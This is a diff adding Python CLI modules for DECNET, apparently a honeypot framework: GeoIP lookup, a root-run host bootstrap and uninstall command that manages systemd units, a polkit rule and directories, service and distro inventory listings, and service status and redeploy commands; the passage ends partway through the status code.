 """GeoIP CLI — refresh and lookup subcommands (master-only).
 Usage::
    decnet geoip refresh          # re-download RIR files and rebuild the index
    decnet geoip lookup 8.8.8.8   # one-shot IP -> country dump
 """
 from __future__ import annotations
 import typer
 from .gating import _require_master_mode
 from .utils import console, log
 _group = typer.Typer(
    name="geoip",
    help="GeoIP provider management (master only).",
    no_args_is_help=True,
 )
@_group.command("refresh")
 def _refresh() -> None:
    """Force re-download of the GeoIP provider data and rebuild the index."""
    _require_master_mode("geoip refresh")
    from decnet.geoip import get_lookup
    from decnet.geoip.factory import get_provider
    provider = get_provider()
    log.info("geoip: forcing refresh via %s provider", provider.name)
    console.print(f"[bold cyan]Refreshing {provider.name} GeoIP data…[/]")
    try:
        lookup = get_lookup(force_refresh=True)
    except Exception as exc:  # noqa: BLE001
        console.print(f"[red]refresh failed: {exc}[/]")
        raise typer.Exit(1) from exc
    console.print(
        f"[green]OK[/] {provider.name} index rebuilt "
        f"({len(lookup)} ranges)."
    )
@_group.command("lookup")
 def _lookup(
    ip: str = typer.Argument(..., help="IP address to resolve."),
 ) -> None:
    """Print the country code for an IP (or 'unknown')."""
    _require_master_mode("geoip lookup")
    from decnet.geoip import enrich_ip
    cc, source = enrich_ip(ip)
    if cc is None:
        console.print(f"{ip} [yellow]unknown[/]")
        raise typer.Exit(0)
    console.print(f"{ip} [green]cc={cc}[/] source={source}")
 def register(app: typer.Typer) -> None:
    app.add_typer(_group, name="geoip")
--- a/decnet/cli/init.py
+++ b/decnet/cli/init.py
@@ -0,0 +1,864 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """
 `decnet init` — one-shot master-host bootstrap.
 Idempotent: running it twice is a no-op on already-configured items.
 Takes a freshly ``pip install``'d DECNET and turns it into a ready-to-
 run master host: creates the ``decnet`` system user/group, installs
 the systemd units + polkit rule + tmpfiles.d entry, seeds the
 directory layout, drops a placeholder config, and starts the
 ``decnet.target`` grouping unit.
 Requires root. Uses ``subprocess.run`` (never ``shell=True``) for every
 privileged call so the full argv surface is auditable.
 """
 from __future__ import annotations
 import grp
 import hashlib
 import os
 import pwd
 import shutil
 import subprocess  # nosec B404
 import sys
 from pathlib import Path
 from typing import Callable, List, Optional
 import typer
 from jinja2 import Environment, FileSystemLoader, StrictUndefined
 import decnet as _decnet_pkg
 from .gating import _require_master_mode
 from .utils import console, log
 _CONFIG_PLACEHOLDER = """\
 # /etc/decnet/decnet.ini — DECNET host config.
 #
 # Every key is OPTIONAL. Absent keys fall through to env-var defaults
 # defined in decnet/env.py. Real env vars always win over this file
 # (precedence: env > INI > default), so systemd EnvironmentFile= and
 # one-off `DECNET_FOO=bar decnet ...` invocations always take effect.
 #
 # Secrets (JWT, admin password, DB password) intentionally DO NOT
 # live here. Put them in /opt/decnet/.env.local or the systemd
 # EnvironmentFile= — never in a group-readable INI.
 [decnet]
 # DECNET-service user/group as configured at `decnet init` time.
 # Resolved to a uid/gid on each host at deploy time via pwd.getpwnam,
 # so the same user name can have different numeric uids on master vs
 # agents without breaking artifact ownership.
 api-user = {api_user}
 api-group = {api_group}
 # mode = master                          # or "agent"
 # [api]
 # host = 127.0.0.1
 # port = 8000
 # [web]
 # host = 127.0.0.1
 # port = 8080
 # admin-user = admin
 # cors-origins = http://localhost:8080   # comma-separated
 # [database]
 # type = sqlite                          # or "mysql"
 # url = mysql+asyncmy://user@host:3306/decnet   # if set, wins over host/port/name/user
 # host = localhost
 # port = 3306
 # name = decnet
 # user = decnet
 # [bus]
 # enabled = true
 # type = unix                            # or "fake"
 # socket = /run/decnet/bus.sock
 # group = decnet
 # [swarm]
 # master-host = 10.0.0.1
 # syslog-port = 6514
 # swarmctl-port = 8770
 # swarmctl-host = 127.0.0.1
 # [logging]
 # system-log = /var/log/decnet/decnet.system.log
 # ingest-log = /var/log/decnet/decnet.log
 # agent-log  = /var/log/decnet/agent.log
 # [ingester]
 # batch-size = 100
 # batch-max-wait-ms = 250
 # [tracing]
 # enabled = false
 # otel-endpoint = http://localhost:4317
 # [agent]
 # Managed by the enroll bundle — do NOT edit by hand on an agent host.
 """
 def _deploy_root() -> Path:
    """Resolve the on-disk ``deploy/`` directory of the installed package.
    Editable install (``pip install -e .``): sibling of the ``decnet``
    package at repo root. Wheel installs aren't supported yet — the
    error message tells the operator to use an editable install.
    """
    root = Path(_decnet_pkg.__file__).resolve().parent.parent / "deploy"
    if not (root / "decnet.target").is_file():
        raise RuntimeError(
            f"cannot locate deploy/ directory (looked at {root}); "
            "are you on a wheel install that didn't bundle deploy/? "
            "use `pip install -e .` from a git checkout"
        )
    return root
 def _sha256(path: Path) -> str:
    h = hashlib.sha256()
    h.update(path.read_bytes())
    return h.hexdigest()
 def _run(argv: List[str], *, dry_run: bool) -> None:
    if dry_run:
        console.print(f"  [dim]would run:[/] {' '.join(argv)}")
        return
    log.info("init: exec %s", argv)
    subprocess.run(argv, check=True)  # nosec B603
 def _step(label: str, action: Callable[[], str]) -> bool:
    """Run ``action``, print a checklist line.
    The callable returns the human-readable outcome verb:
    ``"ok"`` → ``[ OK ] <label>``,
    ``"skip: <reason>"`` → ``[SKIP] <label> (<reason>)``.
    Any exception becomes ``[FAIL] <label>: <err>`` and re-raises.
    """
    try:
        result = action()
    except Exception as exc:  # noqa: BLE001
        console.print(f"[red][FAIL][/] {label}: {exc}")
        raise
    if result.startswith("skip:"):
        reason = result[len("skip:") :].strip()
        console.print(f"[yellow][SKIP][/] {label} ({reason})")
    else:
        console.print(f"[green][ OK ][/] {label}")
    return True
 def _ensure_group(group: str, *, dry_run: bool) -> str:
    try:
        grp.getgrnam(group)
        return f"skip: group {group} already exists"
    except KeyError:
        _run(["groupadd", "--system", group], dry_run=dry_run)
        return "ok"
 def _ensure_user(user: str, group: str, install_dir: str, *, dry_run: bool) -> str:
    try:
        pwd.getpwnam(user)
        return f"skip: user {user} already exists"
    except KeyError:
        _run(
            [
                "useradd", "--system",
                "--gid", group,
                "--home-dir", install_dir,
                "--shell", "/usr/sbin/nologin",
                "--comment", "DECNET honeypot",
                user,
            ],
            dry_run=dry_run,
        )
        return "ok"
 def _ensure_dir(
    path: Path, *, mode: int, owner: str, group: str, dry_run: bool
 ) -> str:
    existed = path.exists()
    if dry_run:
        console.print(
            f"  [dim]would ensure dir:[/] {path} (mode={oct(mode)}, "
            f"owner={owner}:{group})"
        )
        return "skip: dry-run" if existed else "ok"
    path.mkdir(parents=True, exist_ok=True)
    try:
        os.chmod(path, mode)
        uid = pwd.getpwnam(owner).pw_uid
        gid = grp.getgrnam(group).gr_gid
        os.chown(path, uid, gid)
    except (KeyError, PermissionError):
        # owner/group not yet created, or we're not root (--prefix tests).
        # mkdir is the load-bearing part; perm bits come back on the real
        # root run.
        pass
    return f"skip: {path} already present" if existed else "ok"
 def _ensure_config(
    path: Path, group: str, *, user: str, dry_run: bool,
 ) -> str:
    if path.exists():
        return f"skip: {path} already present"
    if dry_run:
        console.print(f"  [dim]would write:[/] {path}")
        return "ok"
    path.parent.mkdir(parents=True, exist_ok=True)
    rendered = _CONFIG_PLACEHOLDER.format(api_user=user, api_group=group)
    path.write_text(rendered)
    try:
        os.chmod(path, 0o640)
        gid = grp.getgrnam(group).gr_gid
        os.chown(path, 0, gid)
    except (KeyError, PermissionError):
        pass
    return "ok"
 def _copy_if_changed(
    src: Path, dst: Path, *, mode: int, force: bool, dry_run: bool
 ) -> str:
    if dst.exists() and not force and _sha256(src) == _sha256(dst):
        return f"skip: {dst} up to date"
    if dry_run:
        console.print(f"  [dim]would install:[/] {src} -> {dst} (mode={oct(mode)})")
        return "ok"
    dst.parent.mkdir(parents=True, exist_ok=True)
    shutil.copy2(src, dst)
    try:
        os.chmod(dst, mode)
        os.chown(dst, 0, 0)
    except PermissionError:
        pass
    return "ok"
 def _render_template(src: Path, context: dict[str, str]) -> str:
    """Render a Jinja2 .j2 template with the given context.
    StrictUndefined: a missing context variable is an error, not a
    silent empty-string substitution — that way a typo in the template
    fails loudly instead of shipping a broken systemd unit.
    """
    env = Environment(
        loader=FileSystemLoader(str(src.parent)),
        undefined=StrictUndefined,
        keep_trailing_newline=True,
        autoescape=False,  # nosec B701 — rendering systemd INI, not HTML
    )
    template = env.get_template(src.name)
    return template.render(**context)
 def _write_rendered_if_changed(
    src: Path, dst: Path, rendered: str, *, mode: int, force: bool, dry_run: bool
 ) -> str:
    """Write *rendered* content to *dst* only if it differs from what's there.
    SHA compares rendered-output ↔ on-disk bytes (NOT source-template ↔
    on-disk) so operators who customise their install_dir get idempotent
    re-runs instead of every ``decnet init`` rewriting files.
    """
    rendered_bytes = rendered.encode("utf-8")
    if dst.exists() and not force:
        if hashlib.sha256(dst.read_bytes()).hexdigest() == hashlib.sha256(rendered_bytes).hexdigest():
            return f"skip: {dst} up to date"
    if dry_run:
        console.print(f"  [dim]would render:[/] {src} -> {dst} (mode={oct(mode)})")
        return "ok"
    dst.parent.mkdir(parents=True, exist_ok=True)
    dst.write_bytes(rendered_bytes)
    try:
        os.chmod(dst, mode)
        os.chown(dst, 0, 0)
    except PermissionError:
        pass
    return "ok"
 def _resolve_venv_dir(install_dir: str, explicit: str | None) -> str:
    """Pick the virtualenv systemd units should ExecStart out of.
    Priority:
      1. ``--venv-dir`` flag (explicit; absolute path required).
      2. ``VIRTUAL_ENV`` env var, but only when it lives under
         ``install_dir`` (refuse to bake /home/user/.venv into a system
         service — that directory is user-owned and may vanish).
      3. ``{install_dir}/venv``  — what ``enroll_bootstrap.sh`` creates
         on fresh agents; the production default.
      4. First hit from a short list of dev-box conventions under
         ``install_dir``:  ``.venv``, ``.311``, ``.312``, ``.313``.
    Raises RuntimeError with an operator-friendly message if none of
    those resolve to a directory containing ``bin/decnet``. Failing loud
    at init time beats systemd spamming journalctl with
    'Failed at step EXEC spawning .../venv/bin/decnet: No such file or
    directory' on every auto-restart.
    """
    install_path = Path(install_dir)
    candidates: list[Path] = []
    if explicit:
        if not explicit.startswith("/"):
            raise RuntimeError(
                f"--venv-dir must be an absolute path, got {explicit!r}"
            )
        candidates.append(Path(explicit))
    else:
        virtual_env = os.environ.get("VIRTUAL_ENV")
        if virtual_env:
            ve_path = Path(virtual_env)
            try:
                ve_path.relative_to(install_path)
                candidates.append(ve_path)
            except ValueError:
                # VIRTUAL_ENV lives outside install_dir — don't bake a
                # user-home venv into a root-owned systemd unit.
                pass
        candidates.append(install_path / "venv")
        for name in (".venv", ".311", ".312", ".313"):
            candidates.append(install_path / name)
    for cand in candidates:
        if (cand / "bin" / "decnet").is_file():
            return str(cand)
    searched = ", ".join(str(c) for c in candidates)
    raise RuntimeError(
        "Could not find a DECNET venv. Create one first (e.g. "
        f"`python -m venv {install_path}/venv && "
        f"{install_path}/venv/bin/pip install -e {install_path}[dev]`) "
        "or pass --venv-dir. Searched: " + searched
    )
 def _install_units(
    deploy: Path,
    systemd_dir: Path,
    *,
    install_dir: str,
    venv_dir: str,
    user: str,
    group: str,
    force: bool,
    dry_run: bool,
 ) -> str:
    """Render decnet-*.service.j2 → systemd_dir/decnet-*.service, and copy
    the static decnet.target (no templating needed — it has no install
    path references)."""
    context = {
        "install_dir": install_dir,
        "venv_dir": venv_dir,
        "user": user,
        "group": group,
    }
    templates = sorted(deploy.glob("decnet-*.service.j2"))
    static = [deploy / "decnet.target"]
    touched = 0
    for src in templates:
        rendered = _render_template(src, context)
        # decnet-api.service.j2 → decnet-api.service
        dst_name = src.name[: -len(".j2")]
        result = _write_rendered_if_changed(
            src, systemd_dir / dst_name, rendered,
            mode=0o644, force=force, dry_run=dry_run,
        )
        if not result.startswith("skip:"):
            touched += 1
    for src in static:
        result = _copy_if_changed(
            src, systemd_dir / src.name,
            mode=0o644, force=force, dry_run=dry_run,
        )
        if not result.startswith("skip:"):
            touched += 1
    total = len(templates) + len(static)
    if touched == 0:
        return f"skip: {total} unit files up to date"
    return f"ok ({touched}/{total} installed)"
 def _install_polkit(
    deploy: Path, rules_dir: Path, *, group: str, force: bool, dry_run: bool
 ) -> str:
    """Render the group-scoped polkit rule to /etc/polkit-1/rules.d/.
    The rule has to reference the same POSIX group passed via --group —
    otherwise the API (running as that user) can't
    systemctl start/stop decnet-*.service without an interactive auth
    prompt that never gets answered in a daemon context.
    """
    src = deploy / "polkit" / "50-decnet-workers.rules.j2"
    if not src.is_file():
        raise RuntimeError(f"missing polkit rule template at {src}")
    rendered = _render_template(src, {"group": group})
    # 50-decnet-workers.rules.j2 → 50-decnet-workers.rules
    dst_name = src.name[: -len(".j2")]
    return _write_rendered_if_changed(
        src, rules_dir / dst_name, rendered,
        mode=0o644, force=force, dry_run=dry_run,
    )
 def _run_allow_fail(argv: List[str], *, dry_run: bool) -> str:
    """Like ``_run`` but tolerates non-zero exits (stop/disable on an
    already-absent unit is fine during deinit)."""
    if dry_run:
        console.print(f"  [dim]would run (allow fail):[/] {' '.join(argv)}")
        return "ok"
    log.info("init: exec (allow fail) %s", argv)
    result = subprocess.run(argv, check=False)  # nosec B603
    if result.returncode != 0:
        return f"skip: rc={result.returncode} (already absent)"
    return "ok"
 def _remove_file(path: Path, *, dry_run: bool) -> str:
    if not path.exists() and not path.is_symlink():
        return f"skip: {path} already absent"
    if dry_run:
        console.print(f"  [dim]would remove:[/] {path}")
        return "ok"
    path.unlink()
    return "ok"
 def _uninstall_units(systemd_dir: Path, *, dry_run: bool) -> str:
    removed = 0
    present = sorted(systemd_dir.glob("decnet-*.service"))
    target = systemd_dir / "decnet.target"
    if target.exists():
        present.append(target)
    for path in present:
        if dry_run:
            console.print(f"  [dim]would remove:[/] {path}")
            removed += 1
            continue
        path.unlink()
        removed += 1
    if removed == 0:
        return "skip: no decnet unit files present"
    return f"ok ({removed} removed)"
 def _remove_user(user: str, *, dry_run: bool) -> str:
    try:
        pwd.getpwnam(user)
    except KeyError:
        return f"skip: user {user} already absent"
    # userdel returns non-zero if the user still owns running
    # processes; that's the operator's problem to sort out, not ours.
    return _run_allow_fail(["userdel", user], dry_run=dry_run)
 def _remove_group(group: str, *, dry_run: bool) -> str:
    try:
        grp.getgrnam(group)
    except KeyError:
        return f"skip: group {group} already absent"
    return _run_allow_fail(["groupdel", group], dry_run=dry_run)
 def _remove_dir_if_present(
    path: Path, *, dry_run: bool, recursive: bool = False
 ) -> str:
    if not path.exists():
        return f"skip: {path} already absent"
    if dry_run:
        verb = "would rm -rf" if recursive else "would rmdir"
        console.print(f"  [dim]{verb}:[/] {path}")
        return "ok"
    if recursive:
        shutil.rmtree(path, ignore_errors=True)
    else:
        try:
            path.rmdir()
        except OSError as exc:
            return f"skip: {path} not empty ({exc.strerror})"
    return "ok"
 def _install_tmpfiles(
    deploy: Path, tmpfiles_dir: Path, *, force: bool, dry_run: bool
 ) -> str:
    src = deploy / "tmpfiles.d" / "decnet.conf"
    if not src.is_file():
        raise RuntimeError(f"missing tmpfiles.d entry at {src}")
    result = _copy_if_changed(
        src, tmpfiles_dir / src.name,
        mode=0o644, force=force, dry_run=dry_run,
    )
    # Apply immediately so /run/decnet exists before daemon-reload.
    _run(["systemd-tmpfiles", "--create", str(tmpfiles_dir / src.name)], dry_run=dry_run)
    return result
 def _install_logrotate(
    deploy: Path, logrotate_dir: Path, *, force: bool, dry_run: bool
 ) -> str:
    """Drop the logrotate config into ``/etc/logrotate.d/decnet``.
    The ingester / forwarder hold the log files open via Python, so the
    config uses ``copytruncate`` rather than rename+create. Without this
    rule, /var/log/decnet/ grows without bound and a single noisy day of
    attacker traffic fills the disk on a small VPS. Best-effort: a host
    without logrotate installed (rare on systemd distros) still boots
    fine — the operator just needs to wire their own rotation.
    """
    src = deploy / "logrotate.d" / "decnet"
    if not src.is_file():
        raise RuntimeError(f"missing logrotate config at {src}")
    return _copy_if_changed(
        src, logrotate_dir / src.name,
        mode=0o644, force=force, dry_run=dry_run,
    )
 def register(app: typer.Typer) -> None:
    @app.command(name="init")
    def init_cmd(
        dry_run: bool = typer.Option(
            False, "--dry-run",
            help="Print every action; make no changes.",
        ),
        no_start: bool = typer.Option(
            False, "--no-start",
            help="Install everything but don't `systemctl enable --now decnet.target`.",
        ),
        force: bool = typer.Option(
            False, "--force",
            help="Overwrite unit / polkit / tmpfiles entries even if identical.",
        ),
        deinit: bool = typer.Option(
            False, "--deinit",
            help="Undo a previous init: stop + disable decnet.target, remove "
                 "unit files, polkit rule, tmpfiles.d entry, /etc/decnet. "
                 "Preserves /var/lib/decnet, /var/log/decnet, and the "
                 "service user/group — pass --purge to remove those too.",
        ),
        purge: bool = typer.Option(
            False, "--purge",
            help="With --deinit, also wipe /var/lib/decnet, "
                 "/var/log/decnet, AND the service user/group. "
                 "Destructive — operator data is gone, and if --user "
                 "points at your own login account, that account goes "
                 "with it. Only use when the user/group was created by "
                 "`decnet init` in the first place.",
        ),
        user: str = typer.Option(
            "decnet", "--user",
            help="System user to own DECNET processes.",
        ),
        group: str = typer.Option(
            "decnet", "--group",
            help="Primary group of the DECNET user.",
        ),
        install_dir: str = typer.Option(
            "/opt/decnet", "--install-dir",
            help="Absolute path where DECNET is installed. Default "
                 "/opt/decnet; distros that reserve /opt can point this "
                 "at /srv/decnet, /usr/local/decnet, etc. Gets rendered "
                 "into every systemd unit via Jinja2 and used as the "
                 "decnet user's home directory.",
        ),
        venv_dir: Optional[str] = typer.Option(
            None, "--venv-dir",
            help="Absolute path to the Python venv systemd should "
                 "ExecStart from. If omitted, auto-detected in order: "
                 "$VIRTUAL_ENV (if under --install-dir), "
                 "{install-dir}/venv, then {install-dir}/{.venv,.311,"
                 ".312,.313}. Init aborts if none exists.",
        ),
        prefix: str = typer.Option(
            "", "--prefix", hidden=True,
            help="Filesystem prefix for tests (e.g. tmp_path). Empty = real root.",
        ),
    ) -> None:
        """One-shot bootstrap of a DECNET master host.
        Creates the `decnet` user/group, installs systemd units,
        polkit rules, tmpfiles.d entries, seeds directories and
        drops a placeholder config, then starts decnet.target.
        """
        _require_master_mode("init")
        if purge and not deinit:
            console.print("[red]--purge only applies with --deinit[/]")
            raise typer.Exit(1)
        # Root check — skip when --prefix is set (tests don't run as root).
        if not prefix and os.geteuid() != 0:
            verb = "deinit" if deinit else "init"
            console.print(f"[red]decnet {verb}: must run as root (use sudo)[/]")
            raise typer.Exit(1)
        if not install_dir.startswith("/"):
            console.print(
                f"[red]decnet init: --install-dir must be absolute, got {install_dir!r}[/]"
            )
            raise typer.Exit(1)
        # Strip leading slash so pfx-joining works under --prefix test mode
        # (Path("/").  / "/opt/decnet" == Path("/opt/decnet"), dropping pfx).
        _install_rel = install_dir.lstrip("/")
        required_tools: tuple[str, ...] = ("systemctl",) if deinit else (
            "systemctl", "useradd", "groupadd", "systemd-tmpfiles",
        )
        if deinit:
            required_tools = required_tools + ("userdel", "groupdel")
        for tool in required_tools:
            if shutil.which(tool) is None and not dry_run:
                verb = "deinit" if deinit else "init"
                console.print(f"[red]decnet {verb}: {tool!r} is required on PATH[/]")
                raise typer.Exit(1)
        pfx = Path(prefix) if prefix else Path("/")
        systemd_dir = pfx / "etc/systemd/system"
        polkit_dir = pfx / "etc/polkit-1/rules.d"
        tmpfiles_dir = pfx / "etc/tmpfiles.d"
        logrotate_dir = pfx / "etc/logrotate.d"
        etc_decnet = pfx / "etc/decnet"
        if deinit:
            console.print(
                f"[bold cyan]DECNET deinit[/] "
                f"(dry_run={dry_run}, purge={purge})"
            )
            _step(
                "systemctl stop + disable decnet.target",
                lambda: _run_allow_fail(
                    ["systemctl", "disable", "--now", "decnet.target"],
                    dry_run=dry_run,
                ),
            )
            _step(
                "remove systemd unit files",
                lambda: _uninstall_units(systemd_dir, dry_run=dry_run),
            )
            _step(
                "remove polkit rule",
                lambda: _remove_file(
                    polkit_dir / "50-decnet-workers.rules",
                    dry_run=dry_run,
                ),
            )
            _step(
                "remove tmpfiles.d entry",
                lambda: _remove_file(
                    tmpfiles_dir / "decnet.conf",
                    dry_run=dry_run,
                ),
            )
            _step(
                "remove logrotate config",
                lambda: _remove_file(
                    logrotate_dir / "decnet",
                    dry_run=dry_run,
                ),
            )
            _step(
                "systemctl daemon-reload",
                lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],  # type: ignore[func-returns-value]
            )
            _step(
                f"remove {etc_decnet / 'decnet.ini'}",
                lambda: _remove_file(etc_decnet / "decnet.ini", dry_run=dry_run),
            )
            # Legacy name from pre-domain-sections placeholder era.
            # Harmless if absent (the _remove_file step logs skip).
            _step(
                f"remove legacy {etc_decnet / 'config.ini'}",
                lambda: _remove_file(etc_decnet / "config.ini", dry_run=dry_run),
            )
            _step(
                f"remove {etc_decnet}",
                lambda: _remove_dir_if_present(etc_decnet, dry_run=dry_run),
            )
            _step(
                f"remove {pfx / 'run/decnet'}",
                lambda: _remove_dir_if_present(
                    pfx / "run/decnet", dry_run=dry_run,
                ),
            )
            _step(
                f"remove {pfx / _install_rel}",
                lambda: _remove_dir_if_present(
                    pfx / _install_rel, dry_run=dry_run,
                ),
            )
            if purge:
                _step(
                    f"purge {pfx / 'var/lib/decnet'}",
                    lambda: _remove_dir_if_present(
                        pfx / "var/lib/decnet",
                        dry_run=dry_run, recursive=True,
                    ),
                )
                _step(
                    f"purge {pfx / 'var/log/decnet'}",
                    lambda: _remove_dir_if_present(
                        pfx / "var/log/decnet",
                        dry_run=dry_run, recursive=True,
                    ),
                )
            else:
                console.print(
                    f"[dim]preserved {pfx / 'var/lib/decnet'} and "
                    f"{pfx / 'var/log/decnet'} (operator data); "
                    "re-run with --purge to remove.[/]"
                )
            # User / group removal is also gated on --purge. In dev the
            # operator may have passed their own login user via
            # `--user $USER` to avoid ownership churn; an unconditional
            # `userdel anti` during deinit would nuke their account.
            if purge:
                _step(
                    f"remove user {user!r}",
                    lambda: _remove_user(user, dry_run=dry_run),
                )
                _step(
                    f"remove group {group!r}",
                    lambda: _remove_group(group, dry_run=dry_run),
                )
            else:
                console.print(
                    f"[dim]preserved user {user!r} and group {group!r}; "
                    "re-run with --purge to remove (only do this if "
                    "they were created by `decnet init`).[/]"
                )
            console.print("[bold green]DECNET deinit complete.[/]")
            return
        try:
            deploy = _deploy_root()
        except RuntimeError as exc:
            console.print(f"[red]decnet init: {exc}[/]")
            raise typer.Exit(1) from exc
        # Resolve venv BEFORE any file writes — fails loud if the
        # operator hasn't created one yet, instead of shipping broken
        # systemd units that journalctl spams forever. Skipped under
        # --prefix (test mode) because the test harness doesn't build a
        # real venv and the rendered string is asserted on directly.
        if prefix:
            resolved_venv = venv_dir or f"{install_dir}/venv"
        else:
            try:
                resolved_venv = _resolve_venv_dir(install_dir, venv_dir)
            except RuntimeError as exc:
                console.print(f"[red]decnet init: {exc}[/]")
                raise typer.Exit(1) from exc
            console.print(f"[dim]using venv: {resolved_venv}[/]")
        dirs = [
            (pfx / _install_rel, 0o755, user, group),
            (pfx / "var/lib/decnet", 0o750, user, group),
            (pfx / "var/lib/decnet/geoip", 0o755, user, group),
            # DEBT-035 / DEBT-047: artifact root carries setgid (the
            # 0o2... bit) so every file written under it inherits the
            # decnet group regardless of which container's uid created
            # it. Group-write (0o2775) lets the API process and the
            # local TTP worker read each other's outputs without a
            # manual chown after every fresh deploy.
            (pfx / "var/lib/decnet/artifacts", 0o2775, user, group),
            (pfx / "var/log/decnet", 0o750, user, group),
            (etc_decnet, 0o755, "root", group),
            (pfx / "run/decnet", 0o755, "root", group),
        ]
        console.print(
            f"[bold cyan]DECNET init[/] "
            f"(dry_run={dry_run}, no_start={no_start}, force={force})"
        )
        _step(
            f"ensure group {group!r}",
            lambda: _ensure_group(group, dry_run=dry_run),
        )
        _step(
            f"ensure user {user!r}",
            lambda: _ensure_user(user, group, install_dir, dry_run=dry_run),
        )
        for path, mode, d_owner, d_group in dirs:
            _step(
                f"ensure dir {path}",
                lambda p=path, m=mode, o=d_owner, g=d_group:  # type: ignore[misc]
                    _ensure_dir(p, mode=m, owner=o, group=g, dry_run=dry_run),
            )
        _step(
            f"write {etc_decnet / 'decnet.ini'}",
            lambda: _ensure_config(
                etc_decnet / "decnet.ini", group,
                user=user, dry_run=dry_run,
            ),
        )
        _step(
            "install systemd units",
            lambda: _install_units(
                deploy, systemd_dir,
                install_dir=install_dir, venv_dir=resolved_venv,
                user=user, group=group,
                force=force, dry_run=dry_run,
            ),
        )
        _step(
            "install polkit rule",
            lambda: _install_polkit(
                deploy, polkit_dir, group=group,
                force=force, dry_run=dry_run,
            ),
        )
        _step(
            "install tmpfiles.d entry",
            lambda: _install_tmpfiles(
                deploy, tmpfiles_dir, force=force, dry_run=dry_run,
            ),
        )
        _step(
            "install logrotate config",
            lambda: _install_logrotate(
                deploy, logrotate_dir, force=force, dry_run=dry_run,
            ),
        )
        _step(
            "systemctl daemon-reload",
            lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],  # type: ignore[func-returns-value]
        )
        if no_start:
            console.print("[yellow]--no-start: skipping decnet.target start[/]")
            return
        try:
            _step(
                "systemctl enable --now decnet.target",
                lambda: (
                    _run(  # type: ignore[func-returns-value]
                        ["systemctl", "enable", "--now", "decnet.target"],
                        dry_run=dry_run,
                    ),
                    "ok",
                )[1],
            )
        except subprocess.CalledProcessError as exc:
            console.print(
                f"[red]decnet.target failed to start (rc={exc.returncode}); "
                "inspect `systemctl status decnet.target` and individual "
                "`decnet-*.service` units.[/]"
            )
            raise typer.Exit(1) from exc
        console.print("[bold green]DECNET init complete.[/] "
                      "Check `decnet status` or the Workers panel.")
        sys.stdout.flush()
--- a/decnet/cli/inventory.py
+++ b/decnet/cli/inventory.py
@@ -0,0 +1,53 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import typer
 from rich.table import Table
 from decnet.archetypes import all_archetypes
 from decnet.distros import all_distros
 from decnet.services.registry import all_services
 from .utils import console
 def register(app: typer.Typer) -> None:
    @app.command(name="services")
    def list_services() -> None:
        """List all registered honeypot service plugins."""
        svcs = all_services()
        table = Table(title="Available Services", show_lines=True)
        table.add_column("Name", style="bold cyan")
        table.add_column("Ports")
        table.add_column("Image")
        for name, svc in sorted(svcs.items()):
            table.add_row(name, ", ".join(str(p) for p in svc.ports), svc.default_image)
        console.print(table)
    @app.command(name="distros")
    def list_distros() -> None:
        """List all available OS distro profiles for deckies."""
        table = Table(title="Available Distro Profiles", show_lines=True)
        table.add_column("Slug", style="bold cyan")
        table.add_column("Display Name")
        table.add_column("Docker Image", style="dim")
        for slug, profile in sorted(all_distros().items()):
            table.add_row(slug, profile.display_name, profile.image)
        console.print(table)
    @app.command(name="archetypes")
    def list_archetypes() -> None:
        """List all machine archetype profiles."""
        table = Table(title="Machine Archetypes", show_lines=True)
        table.add_column("Slug", style="bold cyan")
        table.add_column("Display Name")
        table.add_column("Default Services", style="green")
        table.add_column("Description", style="dim")
        for slug, arch in sorted(all_archetypes().items()):
            table.add_row(
                slug,
                arch.display_name,
                ", ".join(arch.services),
                arch.description,
            )
        console.print(table)
--- a/decnet/cli/lifecycle.py
+++ b/decnet/cli/lifecycle.py
@@ -0,0 +1,148 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import subprocess  # nosec B404
 from typing import Optional
 import typer
 from rich.table import Table
 from decnet.env import DECNET_INGEST_LOG_FILE
 from . import utils as _utils
 from .gating import _agent_mode_active, _require_master_mode
 from .utils import console, log
 def register(app: typer.Typer) -> None:
    @app.command()
    def redeploy(
        log_file: str = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", "-f", help="Path to the DECNET log file"),
    ) -> None:
        """Check running DECNET services and relaunch any that are down."""
        log.info("redeploy: checking services")
        registry = _utils._service_registry(str(log_file))
        table = Table(title="DECNET Services", show_lines=True)
        table.add_column("Service", style="bold cyan")
        table.add_column("Status")
        table.add_column("PID", style="dim")
        table.add_column("Action")
        relaunched = 0
        for name, match_fn, launch_args in registry:
            pid = _utils._is_running(match_fn)
            if pid is not None:
                table.add_row(name, "[green]UP[/]", str(pid), "—")
            else:
                try:
                    subprocess.Popen(  # nosec B603
                        launch_args,
                        stdin=subprocess.DEVNULL,
                        stdout=subprocess.DEVNULL,
                        stderr=subprocess.STDOUT,
                        start_new_session=True,
                    )
                    table.add_row(name, "[red]DOWN[/]", "—", "[green]relaunched[/]")
                    relaunched += 1
                except (FileNotFoundError, subprocess.SubprocessError) as exc:
                    table.add_row(name, "[red]DOWN[/]", "—", f"[red]failed: {exc}[/]")
        console.print(table)
        if relaunched:
            console.print(f"[green]{relaunched} service(s) relaunched.[/]")
        else:
            console.print("[green]All services running.[/]")
    @app.command()
    def status() -> None:
        """Show running deckies and the state of every ``decnet-*`` unit.
        Prefers systemd (``systemctl list-units 'decnet-*.service'``) so
        agents, masters and mixed hosts all get one consistent view of
        what's installed, loaded, and active. Falls back to the psutil
        cmdline registry on boxes without systemd (dev laptops, CI
        containers, non-systemd init) so `decnet status` is still useful
        there.
        """
        log.info("status command invoked")
        from decnet.engine import status as _status
        _status()
        units = _utils._systemd_units()
        if units is not None:
            _render_systemd_units(units)
        else:
            _render_psutil_fallback()
    def _render_systemd_units(units: list[dict]) -> None:
        svc_table = Table(title="DECNET Services (systemd)", show_lines=True)
        svc_table.add_column("Unit", style="bold cyan")
        svc_table.add_column("Load")
        svc_table.add_column("Active")
        svc_table.add_column("Sub")
        svc_table.add_column("Description", style="dim")
        if not units:
            console.print(
                "[yellow]No decnet-* systemd units loaded. "
                "Run `sudo decnet init` to install them.[/]"
            )
            return
        def _active_style(active: str) -> str:
            if active == "active":
                return "[green]active[/]"
            if active == "failed":
                return "[red]failed[/]"
            return f"[yellow]{active}[/]"
        for u in sorted(units, key=lambda x: x.get("unit", "")):
            svc_table.add_row(
                u.get("unit", ""),
                u.get("load", ""),
                _active_style(u.get("active", "")),
